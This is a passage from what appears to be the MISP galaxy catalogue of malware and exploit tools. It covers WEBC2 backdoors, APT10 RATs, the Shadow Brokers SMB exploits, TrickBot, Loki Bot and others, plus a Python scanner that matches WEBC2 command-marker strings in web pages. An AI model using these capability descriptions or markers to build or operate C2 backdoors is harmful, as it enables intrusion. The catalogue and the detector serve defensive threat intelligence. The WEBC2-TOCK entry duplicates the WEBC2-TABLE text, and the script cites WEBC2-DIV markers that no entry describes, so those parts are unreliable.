http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-HEAD

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-HEAD variant communicates over HTTPS, using the system’s SSL implementation to encrypt all communications with the C2 server. WEBC2-HEAD first issues an HTTP GET to the host, sending the Base64-encoded string containing the name of the compromised machine running the malware.

The tag is: misp-galaxy:tool="WEBC2-HEAD"

WEBC2-HEAD has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Head" with estimative-language:likelihood-probability="almost-certain"

Table 16481. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-KT3

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-KT3 variant searches for commands in a specific comment tag. Network traffic starting with *!Kt3+v| may indicate WEBC2-KT3 activity.

The tag is: misp-galaxy:tool="WEBC2-KT3"

WEBC2-KT3 has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Kt3" with estimative-language:likelihood-probability="almost-certain"

Table 16482. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-QBP

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-QBP variant searches an HTML comment for two delimiter strings: "2010QBP " followed by " 2010QBP//--". The data between these delimiters is a DES-encrypted string.

The tag is: misp-galaxy:tool="WEBC2-QBP"

WEBC2-QBP has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Qbp" with estimative-language:likelihood-probability="almost-certain"

Table 16483. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-RAVE

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware sets itself up as a service, connects out to a hardcoded web page and reads a modified base64 string from that page. Later versions of this malware support three commands (earlier ones are just downloaders or reverse shells). The first command sleeps the malware for N hours. The second downloads a binary from the encoded HTML comment and executes it on the infected host. The third spawns an encoded reverse shell to an attacker-specified host and port.

The tag is: misp-galaxy:tool="WEBC2-RAVE"

WEBC2-RAVE has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Rave" with estimative-language:likelihood-probability="almost-certain"

Table 16484. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-TABLE

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TABLE variant looks for web pages containing 'background', 'align', and 'bgcolor' tags to be present in the requested Web page. If the data in these tags are formatted correctly, the malware will decode a second URL and a filename. This URL is then retrieved, written to the decoded filename and executed.

The tag is: misp-galaxy:tool="WEBC2-TABLE"

WEBC2-TABLE has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Table" with estimative-language:likelihood-probability="almost-certain"

Table 16485. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-TOCK

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TABLE variant looks for web pages containing 'background', 'align', and 'bgcolor' tags to be present in the requested Web page. If the data in these tags are formatted correctly, the malware will decode a second URL and a filename. This URL is then retrieved, written to the decoded filename and executed.

The tag is: misp-galaxy:tool="WEBC2-TOCK"

Table 16486. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-UGX

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware provide remote command shell and remote file download and execution capabilities. The malware downloads a web page containing a crafted HTML comment that subsequently contains an encoded command. The contents of this command tell the malware whether to download and execute a program, launch a reverse shell to a specific host and port number, or to sleep for a period of time.

The tag is: misp-galaxy:tool="WEBC2-UGX"

WEBC2-UGX has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-UGX" with estimative-language:likelihood-probability="almost-certain"

Table 16487. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-Y21K

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of backdoor malware talk to specific Web-based Command & Control (C2) servers. The backdoor has a limited command set, depending on version. It is primarily a downloader, but it is classified as a backdoor because it can accept a limited command set, including changing local directories, downloading and executing additional files, sleeping, and connecting to a specific IP & port not initially included in the instruction set for the malware. Each version of the malware has at least one hardcoded URL to which it connects to receive its initial commands. This family of malware installs itself as a service, with the malware either being the executable run by the service, or the service DLL loaded by a legitimate service. The same core code is seen recompiled on different dates or with different names, but with the same functionality. Key signatures include a specific set of exported functions (some of which can be used with the OS-provided rundll32.exe tool to install the malware as a service), and hardcoded strings used in communication with C2 servers to issue commands to the implant.

The tag is: misp-galaxy:tool="WEBC2-Y21K"

Table 16488. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html

WEBC2-YAHOO

The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-YAHOO variant enters a loop where every ten minutes it attempts to download a web page that may contain an encoded URL. The encoded URL will be found in the pages returned inside an attribute named 'sb' or 'ex' within a tag named 'yahoo'. The embedded link can direct the malware to download and execute files.

The tag is: misp-galaxy:tool="WEBC2-YAHOO"

WEBC2-YAHOO has relationships with:

  • similar: misp-galaxy:malpedia="WebC2-Yahoo" with estimative-language:likelihood-probability="almost-certain"

Table 16489. Table References

Links

http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html
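The WEBC2 variants described above differ mainly in the literal markers each one looks for in the retrieved page. The following Python script is an added example, not code from the MISP galaxy, from Mandiant or from the referenced report: it scans a fetched HTML body for the markers the descriptions document and extracts the bracketed data, namely the WEBC2-KT3 prefix "*!Kt3+v|", the WEBC2-QBP delimiters "2010QBP " and " 2010QBP//--", the WEBC2-DIV delimiters "div safe:" and " balance", the 'sb'/'ex' attributes of a 'yahoo' tag (WEBC2-YAHOO), and any tag carrying 'background', 'align' and 'bgcolor' attributes (WEBC2-TABLE). The sample page is constructed for the example. Decoding of the extracted payloads (DES for QBP; undocumented for the others) is deliberately not attempted, so the scanner only surfaces candidate command data for an analyst to look at.

```python
"""Scan an HTML body for WEBC2-style command markers.

Added example, not code from the MISP galaxy or from Mandiant's APT1
report.  The marker strings come from the WEBC2 variant descriptions;
the sample page at the bottom is constructed for this example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Hit:
    family: str   # WEBC2 variant whose marker matched
    payload: str  # raw data found between the markers (not decoded)


# WEBC2-KT3: traffic/comment starting with "*!Kt3+v|"; take the rest of the line or comment.
_KT3_RE = re.compile(r"\*!Kt3\+v\|(.*?)(?=\s*-->|[\r\n]|$)")
# WEBC2-QBP: "2010QBP " ... " 2010QBP//--" inside an HTML comment (payload is DES-encrypted).
_QBP_RE = re.compile(r"2010QBP (.*?) 2010QBP//--", re.S)
# WEBC2-DIV: "div safe:" ... " balance" delimit the encoded C2 data.
_DIV_RE = re.compile(r"div safe:(.*?) balance", re.S)
# WEBC2-YAHOO: a 'yahoo' tag whose 'sb' or 'ex' attribute carries an encoded URL.
_YAHOO_TAG_RE = re.compile(r"<yahoo\b[^>]*>", re.I)
_SB_EX_RE = re.compile(r"\b(sb|ex)\s*=\s*['\"]([^'\"]*)['\"]", re.I)
# WEBC2-TABLE: a single tag carrying all three of these (otherwise ordinary) attributes.
_TAG_RE = re.compile(r"<[A-Za-z][^>]*>")
_TABLE_ATTRS = ("background", "align", "bgcolor")


def scan_webc2(html: str) -> list[Hit]:
    """Return every WEBC2 marker found in the page body, in document order per family."""
    hits: list[Hit] = []
    for m in _KT3_RE.finditer(html):
        hits.append(Hit("WEBC2-KT3", m.group(1).strip()))
    for m in _QBP_RE.finditer(html):
        hits.append(Hit("WEBC2-QBP", m.group(1)))
    for m in _DIV_RE.finditer(html):
        hits.append(Hit("WEBC2-DIV", m.group(1)))
    for tag in _YAHOO_TAG_RE.finditer(html):
        for attr in _SB_EX_RE.finditer(tag.group(0)):
            hits.append(Hit("WEBC2-YAHOO", f"{attr.group(1).lower()}={attr.group(2)}"))
    for tag in _TAG_RE.finditer(html):
        text = tag.group(0)
        # All three attribute names must be present on the same tag (order is not documented).
        if all(re.search(rf"\b{name}\s*=", text, re.I) for name in _TABLE_ATTRS):
            hits.append(Hit("WEBC2-TABLE", text))
    return hits


def families(hits: list[Hit]) -> list[str]:
    """Sorted list of the distinct WEBC2 variants that produced a hit."""
    return sorted({h.family for h in hits})


# Constructed sample page exercising every marker once; the payloads are meaningless filler.
SAMPLE_PAGE = """<html><head><title>Welcome</title></head>
<body>
<!-- *!Kt3+v|c2lnbmFsOnNsZWVwOjM2MDA= -->
<p>Latest news and div safe:ZG93bmxvYWQgaHR0cDovL2V4YW1wbGUuY29t balance sheet.</p>
<!-- 2010QBP 7f3a9c1e2b4d6a8f 2010QBP//-->
<yahoo sb="aHR0cDovL2V4YW1wbGUubmV0L3VwZGF0ZS5leGU=">
<td background="a.gif" align="center" bgcolor="#ffffff">x</td>
</body></html>"""


if __name__ == "__main__":
    for hit in scan_webc2(SAMPLE_PAGE):
        print(f"{hit.family:14} {hit.payload}")
```

Two caveats when using this against real traffic: 'background', 'align' and 'bgcolor' are ordinary HTML attributes, so a WEBC2-TABLE hit on its own is weak evidence and should be corroborated by the request pattern (fixed URL, fixed interval) described above, whereas the KT3, QBP, DIV and 'yahoo' markers are specific literals that legitimate pages are unlikely to contain. The markers are also tied to the 2013-era samples Mandiant described; treat them as historical signatures rather than current coverage.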

HAYMAKER

HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string.

The tag is: misp-galaxy:tool="HAYMAKER"

HAYMAKER has relationships with:

  • similar: misp-galaxy:mitre-malware="ChChes - S0144" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="ChChes" with estimative-language:likelihood-probability="likely"

Table 16490. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

BUGJUICE

BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious DLL into it. That malicious DLL then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPS if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell.

The tag is: misp-galaxy:tool="BUGJUICE"

BUGJUICE has relationships with:

  • similar: misp-galaxy:rat="RedLeaves" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="RedLeaves - S0153" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="RedLeaves" with estimative-language:likelihood-probability="likely"

Table 16491. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

SNUGRIDE

SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell. Persistence is maintained through a Run registry key.

The tag is: misp-galaxy:tool="SNUGRIDE"

SNUGRIDE has relationships with:

  • similar: misp-galaxy:mitre-malware="SNUGRIDE - S0159" with estimative-language:likelihood-probability="likely"

Table 16492. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

QUASARRAT

QUASARRAT is an open-source RAT available at https://github.com/quasar/QuasarRat . The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open-source version. The 2.0 versions require a dropper to decipher and launch the AES-encrypted QUASARRAT payload. QUASARRAT is a fully functional, publicly available .NET backdoor for Windows that has been used by multiple cyber espionage groups in the past. It may visit a website and download, upload, and execute files. QUASARRAT may acquire system information, act as a remote desktop or shell, or remotely activate the webcam. The backdoor may also log keystrokes and steal passwords from commonly used browsers and FTP clients. QUASARRAT was originally named xRAT before it was renamed by the developers in August 2015. Availability: Public

The tag is: misp-galaxy:tool="QUASARRAT"

QUASARRAT has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="Quasar RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Quasar RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="likely"

Table 16493. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

https://researchcenter.paloaltonetworks.com/2017/10/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

da Vinci RCS

Hacking Team’s "DaVinci" Remote Control System is able, the company says, to break encryption and allow law enforcement agencies to monitor encrypted files and emails (even ones encrypted with PGP), Skype and other Voice over IP or chat communication. It allows identification of the target’s location and relationships. It can also remotely activate microphones and cameras on a computer and works worldwide. Hacking Team claims that its software is able to monitor hundreds of thousands of computers at once, all over the country. Trojans are available for Windows, Mac, Linux, iOS, Android, Symbian and Blackberry.

The tag is: misp-galaxy:tool="da Vinci RCS"

da Vinci RCS is also known as:

  • DaVinci

  • Morcut

Table 16494. Table References

Links

http://surveillance.rsf.org/en/hacking-team/

https://wikileaks.org/hackingteam/emails/fileid/581640/267803

https://wikileaks.org/hackingteam/emails/emailid/31436

LATENTBOT

LATENTBOT is a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without being noticed, and can even corrupt a hard disk, rendering the PC unusable.

The tag is: misp-galaxy:tool="LATENTBOT"

LATENTBOT has relationships with:

  • similar: misp-galaxy:malpedia="LatentBot" with estimative-language:likelihood-probability="almost-certain"

Table 16495. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html

FINSPY

Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.

The tag is: misp-galaxy:tool="FINSPY"

FINSPY is also known as:

  • BlackOasis

FINSPY has relationships with:

  • similar: misp-galaxy:rat="FINSPY" with estimative-language:likelihood-probability="likely"

Table 16496. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html

RCS Galileo

HackingTeam Remote Control System (RCS) Galileo hacking platform

The tag is: misp-galaxy:tool="RCS Galileo"

Table 16497. Table References

Links

https://www.f-secure.com/documents/996508/1030745/callisto-group

EARLYSHOVEL

Red Hat Linux 7.0 - 7.1 Sendmail 8.11.x exploit

The tag is: misp-galaxy:tool="EARLYSHOVEL"

Table 16498. Table References

Links

https://github.com/misterch0c/shadowbroker

EBBISLAND (EBBSHAVE)

root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86

The tag is: misp-galaxy:tool="EBBISLAND (EBBSHAVE)"

Table 16499. Table References

Links

https://github.com/misterch0c/shadowbroker

ECHOWRECKER

remote Samba 3.0.x Linux exploit

The tag is: misp-galaxy:tool="ECHOWRECKER"

Table 16500. Table References

Links

https://github.com/misterch0c/shadowbroker

EASYBEE

an exploit for what appears to be an MDaemon email server vulnerability

The tag is: misp-galaxy:tool="EASYBEE"

Table 16501. Table References

Links

https://github.com/misterch0c/shadowbroker

EASYPI

an IBM Lotus Notes exploit that antivirus products detect as Stuxnet

The tag is: misp-galaxy:tool="EASYPI"

Table 16502. Table References

Links

https://github.com/misterch0c/shadowbroker

EWOKFRENZY

an exploit for IBM Lotus Domino 6.5.4 & 7.0.2

The tag is: misp-galaxy:tool="EWOKFRENZY"

Table 16503. Table References

Links

https://github.com/misterch0c/shadowbroker

EXPLODINGCAN

an IIS 6.0 exploit that creates a remote backdoor

The tag is: misp-galaxy:tool="EXPLODINGCAN"

Table 16504. Table References

Links

https://github.com/misterch0c/shadowbroker

ETERNALROMANCE

an SMBv1 exploit over TCP port 445 targeting Windows XP, Server 2003, Vista, 7, 8, Server 2008 and 2008 R2; it yields SYSTEM privileges (MS17-010)

The tag is: misp-galaxy:tool="ETERNALROMANCE"

Table 16505. Table References

Links

https://github.com/misterch0c/shadowbroker

EDUCATEDSCHOLAR

an SMB exploit (MS09-050)

The tag is: misp-galaxy:tool="EDUCATEDSCHOLAR"

Table 16506. Table References

Links

https://github.com/misterch0c/shadowbroker

EMERALDTHREAD

an SMB exploit for Windows XP and Server 2003 (MS10-061)

The tag is: misp-galaxy:tool="EMERALDTHREAD"

Table 16507. Table References

Links

https://github.com/misterch0c/shadowbroker

EMPHASISMINE

a remote IMAP exploit for IBM Lotus Domino 6.6.4 to 8.5.2

The tag is: misp-galaxy:tool="EMPHASISMINE"

Table 16508. Table References

Links

https://github.com/misterch0c/shadowbroker

ENGLISHMANSDENTIST

abuses Outlook Web Access (Exchange) rules to trigger executable code on the client side and send email to other users

The tag is: misp-galaxy:tool="ENGLISHMANSDENTIST"

Table 16509. Table References

Links

https://github.com/misterch0c/shadowbroker

EPICHERO

0-day exploit (RCE) for Avaya Call Server

The tag is: misp-galaxy:tool="EPICHERO"

Table 16510. Table References

Links

https://github.com/misterch0c/shadowbroker

ERRATICGOPHER

SMBv1 exploit targeting Windows XP and Server 2003

The tag is: misp-galaxy:tool="ERRATICGOPHER"

Table 16511. Table References

Links

https://github.com/misterch0c/shadowbroker

ETERNALSYNERGY

an SMB remote code execution exploit for Windows 8 and Server 2012 SP0 (MS17-010; the flaws patched by that bulletin are in the SMBv1 server)

The tag is: misp-galaxy:tool="ETERNALSYNERGY"

Table 16512. Table References

Links

https://github.com/misterch0c/shadowbroker

ETERNALBLUE

SMB exploit for Windows 7 SP1 (MS17-010; the underlying vulnerability is in the SMBv1 server, although the exploit also speaks SMBv2)

The tag is: misp-galaxy:tool="ETERNALBLUE"

Table 16513. Table References

Links

https://github.com/misterch0c/shadowbroker

ETERNALCHAMPION

an SMBv1 exploit (MS17-010)

The tag is: misp-galaxy:tool="ETERNALCHAMPION"

Table 16514. Table References

Links

https://github.com/misterch0c/shadowbroker

ESKIMOROLL

Kerberos exploit targeting Windows 2000, 2003, 2008 and 2008 R2 domain controllers (MS14-068)

The tag is: misp-galaxy:tool="ESKIMOROLL"

Table 16515. Table References

Links

https://github.com/misterch0c/shadowbroker

ESTEEMAUDIT

RDP exploit and backdoor for Windows Server 2003

The tag is: misp-galaxy:tool="ESTEEMAUDIT"

Table 16516. Table References

Links

https://github.com/misterch0c/shadowbroker

ECLIPSEDWING

RCE exploit for the Server service in Windows 2000 through Server 2008 (MS08-067)

The tag is: misp-galaxy:tool="ECLIPSEDWING"

Table 16517. Table References

Links

https://github.com/misterch0c/shadowbroker

ETRE

exploit for IMail 8.10 to 8.22

The tag is: misp-galaxy:tool="ETRE"

Table 16518. Table References

Links

https://github.com/misterch0c/shadowbroker

FUZZBUNCH

an exploit framework, similar to Metasploit, used to launch the exploits in this dump

The tag is: misp-galaxy:tool="FUZZBUNCH"

Table 16519. Table References

Links

https://securelist.com/darkpulsar/88199/

https://github.com/misterch0c/shadowbroker

ODDJOB

implant builder and C&C server that can deliver exploits to Windows 2000 and later; at the time of the leak it was not detected by any AV vendor

The tag is: misp-galaxy:tool="ODDJOB"

ODDJOB has relationships with:

  • similar: misp-galaxy:malpedia="OddJob" with estimative-language:likelihood-probability="almost-certain"

Table 16520. Table References

Links

https://github.com/misterch0c/shadowbroker

PASSFREELY

utility which bypasses authentication for Oracle servers

The tag is: misp-galaxy:tool="PASSFREELY"

Table 16521. Table References

Links

https://github.com/misterch0c/shadowbroker

SMBTOUCH

check if the target is vulnerable to samba exploits like ETERNALSYNERGY, ETERNALBLUE, ETERNALROMANCE

The tag is: misp-galaxy:tool="SMBTOUCH"

Table 16522. Table References

Links

https://github.com/misterch0c/shadowbroker

ERRATICGOPHERTOUCH

Check if the target is running some RPC

The tag is: misp-galaxy:tool="ERRATICGOPHERTOUCH"

Table 16523. Table References

Links

https://github.com/misterch0c/shadowbroker

IISTOUCH

check if the running IIS version is vulnerable

The tag is: misp-galaxy:tool="IISTOUCH"

Table 16524. Table References

Links

https://github.com/misterch0c/shadowbroker

RPCOUTCH

Get info about Windows via RPC

The tag is: misp-galaxy:tool="RPCOUTCH"

Table 16525. Table References

Links

https://github.com/misterch0c/shadowbroker

DOPU

Used to connect to machines exploited by ETERNALCHAMPION

The tag is: misp-galaxy:tool="DOPU"

Table 16526. Table References

Links

https://github.com/misterch0c/shadowbroker

FlexSpy

covert surveillance tools

The tag is: misp-galaxy:tool="FlexSpy"

feodo

Unfortunately, it is time to meet 'Feodo'. Since August of this year, when FireEye’s MPS devices detected this malware in the field, we have been monitoring this banking trojan very closely. In many ways, this malware looks similar to other famous banking trojans like Zbot and SpyEye. However, my analysis says that this malware is not a toolkit and is in the hands of a single criminal group.

The tag is: misp-galaxy:tool="feodo"

feodo has relationships with:

  • similar: misp-galaxy:malpedia="Feodo" with estimative-language:likelihood-probability="almost-certain"

Table 16527. Table References

Links

https://www.fireeye.com/blog/threat-research/2010/10/feodosoff-a-new-botnet-on-the-rise.html

Cardinal RAT

Palo Alto Networks has discovered a previously unknown remote access Trojan (RAT) that has been active for over two years. It has a very low volume in this two-year period, totaling roughly 27 total samples. The malware is delivered via an innovative and unique technique: a downloader we are calling Carp uses malicious macros in Microsoft Excel documents to compile embedded C# (C Sharp) Programming Language source code into an executable that in turn is run to deploy the Cardinal RAT malware family. These malicious Excel files use a number of different lures, providing evidence of what attackers are using to entice victims into executing them.

The tag is: misp-galaxy:tool="Cardinal RAT"

Cardinal RAT has relationships with:

  • similar: misp-galaxy:tool="EVILNUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Cardinal RAT" with estimative-language:likelihood-probability="almost-certain"

Table 16528. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/

REDLEAVES

The REDLEAVES implant consists of three parts: an executable, a loader, and the implant shellcode. The REDLEAVES implant is a remote administration Trojan (RAT) that is built in Visual C++ and makes heavy use of thread generation during its execution. The implant contains a number of functions typical of RATs, including system enumeration and creating a remote shell back to the C2.

The tag is: misp-galaxy:tool="REDLEAVES"

REDLEAVES has relationships with:

  • similar: misp-galaxy:malpedia="RedLeaves" with estimative-language:likelihood-probability="almost-certain"

Table 16529. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-117A

Kazuar

Kazuar is a fully featured backdoor written using the .NET Framework and obfuscated using the open source packer called ConfuserEx. Unit 42 researchers have uncovered a backdoor Trojan used in an espionage campaign. The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan’s capabilities. During our analysis of this malware we uncovered interesting code paths and other artifacts that may indicate a Mac or Unix variant of this same tool also exists. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver. We suspect the Kazuar tool may be linked to the Turla threat actor group (also known as Uroburos and Snake), who have been reported to have compromised embassies, defense contractors, educational institutions, and research organizations across the globe. A hallmark of Turla operations is iteration of their tools, and the code lineage of Kazuar can be traced back to at least 2005. If the hypothesis is correct and the Turla threat group is using Kazuar, we believe they may be using it as a replacement for Carbon and its derivatives. Of the myriad tools observed in use by Turla, Carbon and its variants were typically deployed as a second stage backdoor within targeted environments, and we believe Kazuar may now hold a similar role for Turla operations.

The tag is: misp-galaxy:tool="Kazuar"

Kazuar has relationships with:

  • similar: misp-galaxy:malpedia="Kazuar" with estimative-language:likelihood-probability="likely"

Table 16530. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/

Trick Bot

Many links indicate that this bot is another product of the people previously involved in Dyreza. It seems to be rewritten from scratch; however, it contains many similar features and solutions to those we encountered analyzing Dyreza.

The tag is: misp-galaxy:tool="Trick Bot"

Trick Bot is also known as:

  • TrickBot

  • TrickLoader

Trick Bot has relationships with:

  • similar: misp-galaxy:malpedia="TrickBot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:banker="Trickbot" with estimative-language:likelihood-probability="likely"

Table 16531. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/

https://blog.fraudwatchinternational.com/malware/trickbot-malware-works

https://securityintelligence.com/trickbot-is-hand-picking-private-banks-for-targets-with-redirection-attacks-in-tow/

https://www.bleepingcomputer.com/news/security/trickbot-banking-trojan-gets-screenlocker-component/

Hackshit

Netskope Threat Research Labs recently discovered a Phishing-as-a-Service (PhaaS) platform named Hackshit, that records the credentials of the phished bait victims. The phished bait pages are packaged with base64 encoding and served from secure (HTTPS) websites with “.moe” top level domain (TLD) to evade traditional scanners. “.moe” TLD is intended for the purpose of ‘The marketing of products or services deemed’. The victim’s credentials are sent to the Hackshit PhaaS platform via websockets. The Netskope Active Platform can proactively protect customers by creating custom applications and a policy to block all the activities related to Hackshit PhaaS.

The tag is: misp-galaxy:tool="Hackshit"

Table 16532. Table References

Links

https://resources.netskope.com/h/i/352356475-phishing-as-a-service-phishing-revamped

Moneygram Adwind

The tag is: misp-galaxy:tool="Moneygram Adwind"

Table 16533. Table References

Links

https://myonlinesecurity.co.uk/new-guidelines-from-moneygram-malspam-delivers-a-brand-new-java-adwind-version/

Banload

Banload has been around since the last decade. This malware generally arrives on a victim’s system through a spam email containing an archived file or bundled software as an attachment. In a few cases, this malware may also be dropped by other malware or a drive-by download. When executed, Banload downloads other malware, often banking Trojans, on the victim’s system to carry out further infections.

The tag is: misp-galaxy:tool="Banload"

Banload has relationships with:

  • similar: misp-galaxy:malpedia="Banload" with estimative-language:likelihood-probability="almost-certain"

Table 16534. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/03/banload-malware-affecting-brazil-exhibits-unusually-complex-infection-process/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/banload

http://blog.trendmicro.com/trendlabs-security-intelligence/banload-limits-targets-via-security-plugin/

https://securingtomorrow.mcafee.com/mcafee-labs/banload-trojan-targets-brazilians-with-malware-downloads/

Smoke Loader

This small application is used to download other malware. What makes the bot interesting are the various tricks that it uses for deception and self-protection.

The tag is: misp-galaxy:tool="Smoke Loader"

Smoke Loader is also known as:

  • SmokeLoader

Smoke Loader has relationships with:

  • similar: misp-galaxy:mitre-malware="Smoke Loader - S0226" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="SmokeLoader" with estimative-language:likelihood-probability="likely"

Table 16535. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/

LockPoS

The analyzed sample has a recent compilation date (2017-06-24) and is available on VirusTotal. It starts out by resolving several Windows functions using API hashing (CRC32 is used as the hashing function).

The tag is: misp-galaxy:tool="LockPoS"

LockPoS has relationships with:

  • similar: misp-galaxy:malpedia="LockPOS" with estimative-language:likelihood-probability="almost-certain"

Table 16536. Table References

Links

https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/

Fadok

Win.Worm.Fadok drops several files. %AppData%\RAC\mls.exe or %AppData%\RAC\svcsc.exe are instances of the malware which are auto-started when Windows starts. Further, the worm drops and opens a Word document. It connects to the domain wxanalytics[.]ru.

The tag is: misp-galaxy:tool="Fadok"

Fadok is also known as:

  • Win32/Fadok

Table 16537. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm%3AWin32%2FFadok.A

http://blog.talosintelligence.com/2017/06/threat-roundup-0602-0609.html

Loki Bot

Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.

The tag is: misp-galaxy:tool="Loki Bot"

Table 16538. Table References

Links

https://phishme.com/loki-bot-malware/

KONNI

Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim’s machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time. In this article, we will analyse this evolution:

The tag is: misp-galaxy:tool="KONNI"

KONNI has relationships with:

  • similar: misp-galaxy:rat="Konni" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Konni" with estimative-language:likelihood-probability="likely"

Table 16539. Table References

Links

http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html

